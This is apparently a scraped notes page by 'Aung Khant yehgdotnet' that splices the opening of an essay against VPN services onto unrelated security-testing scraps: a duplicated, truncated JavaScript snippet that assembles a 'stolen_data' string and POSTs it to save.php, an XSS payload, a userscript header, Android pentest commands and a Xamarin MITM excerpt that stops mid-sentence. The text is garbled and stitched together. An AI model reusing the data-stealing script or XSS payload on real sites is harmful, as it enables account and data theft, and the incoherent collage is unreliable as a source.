Aung Khant yehgdotnet

Don't use VPN services.

No, seriously, don't. You're probably reading this because you've asked what VPN service to use, and this is the answer.

Note: The content in this post does not apply to using VPN for their intended purpose; that is, as a virtual private (internal) network. It only applies to using it as a glorified proxy, which is what every third-party "VPN provider" does.

A Russian translation of this article can be found here, contributed by Timur Demin. There's also this article about VPN services, which is honestly better written (and has more cat pictures!) than my article.

	<!-- -->
	<script>
	function SavetoServer(data){
	var xhttp = new XMLHttpRequest();
	xhttp.open("POST", "save.php", true);
	xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
	xhttp.send(data);
	}

	function parseResponse(s){

	<script>
	function SavetoServer(data){
	var xhttp = new XMLHttpRequest();
	xhttp.open("POST", "save.php", true);
	xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
	xhttp.send(data);
	}

	function parseResponse(s){
	stolen_data = "id=" + s['Id'] + "&name=" + s['Name'] + '&rank=' + s['Rank'];

	// ==UserScript==
	// @name Readable_Font
	// @namespace http://yehg.net
	// @version 0.1
	// @author yehg.net
	// @description TamperMonkey Use Readable Font from MEDIUM.COM
	// @author You
	// @match http://your-favourite-news-site/*
	// @grant none
	// ==/UserScript==

	## Dumping SQLite
	sqlite3 [db] ".dump"

	#### Getting IP address:

	in Android emulator, run netcfg or ip addr to know the ip address

	#### Elevating Terminal app to Root Terminal

	type: su

	Correct Backup Analysis Approach


	Procedure for backup analysis
	=============================
	before-app-run
	during app run
	post-run

	# 1st param is command; #2nd param is file

	while read -r line; do $1 $line ; done < $2

	https://mobile-security.gitbook.io/mobile-security-testing-guide/general-mobile-app-testing-guide/0x04f-testing-network-communication

	Dealing with Xamarin

	Xamarin is a mobile application development platform that is capable of producing native Android and iOS apps by using Visual Studio and C# as programming language.

	When testing a Xamarin app and when you are trying to set the system proxy in the WiFi settings you won't be able to see any HTTP requests in your interception proxy, as the apps created by Xamarin do not use the local proxy settings of your phone. There are two ways to resolve this:

	Add a default proxy to the app, by adding the following code in the OnCreate()or Main() method and re-create the app:WebRequest.DefaultWebProxy = new WebProxy("192.168.11.1", 8080); Use ettercap in order to get a man-in-the-middle position (MITM), see the section above about how to setup a MITM attack. When being MITM we only need to redirect port 443 to our interception proxy running on localhost. This can be d

	https://jsfiddle.net/qa231rnp/

	<imgsrc=xonerror=prompt(1)>

Aung Khant yehgdotnet

Don't use VPN services.

Why not?